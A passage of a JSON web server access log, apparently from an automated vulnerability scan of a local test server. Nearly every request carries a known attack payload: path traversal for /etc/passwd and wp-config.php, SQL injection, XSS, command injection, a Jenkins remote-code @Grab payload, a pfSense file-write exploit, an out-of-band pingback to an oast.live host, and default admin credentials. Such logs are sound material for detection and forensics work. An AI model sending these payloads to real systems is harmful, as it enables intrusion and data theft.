"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /apc.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.268","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/modules/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.289","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.348","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"userName=admin&password=axis2&submit=+Login+","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /axis2/axis2-admin/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.112","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/34 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/prometheus HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.274","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hui/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.276","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"\x0D\x0A\x0D\x0Apingback.ping\x0D\x0A\x0D\x0A\x0D\x0Ahttp://c9oms3gsmpve1ijt0mc0quhwpbpxhd7p9.oast.live\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /xmlrpc/pingback HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.303","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Reports/Pages/Folder.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.272","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /SSI/Auth/ip_snmp.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /zenario/admin/welcome.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.895","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://example.com&action=nf_oauth_connect HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /equipbid/storage/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.293","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.388","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/35 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.236","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.240","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.244","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.266","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/functions/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.378","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /client/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.281","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/elementor/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.265","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphiql/finland HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.924","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.717","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///https://example.com@/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /am/UI/Login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /apimanui/api-manager HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.377","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /server/storage/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.239","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..;/manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.246","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /backend/admin/common/clearcache?previousUrl=http://www.example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.915","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/flip/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x5Cx3c\x5Cx3fphp+var_dump(md5(\x5Cx27CVE-2021-41282\x5Cx27));unlink(__FILE__)\x5Cx3b\x5Cx3f\x5Cx3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.355","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/36 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openx/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //%3C%3E//example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.330","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..;/host-manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fckeditor/_samples/default.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.273","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.247","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.265","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /intikal/storage/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /CMSPages/GetDocLink.ashx?link=https://example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.658","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 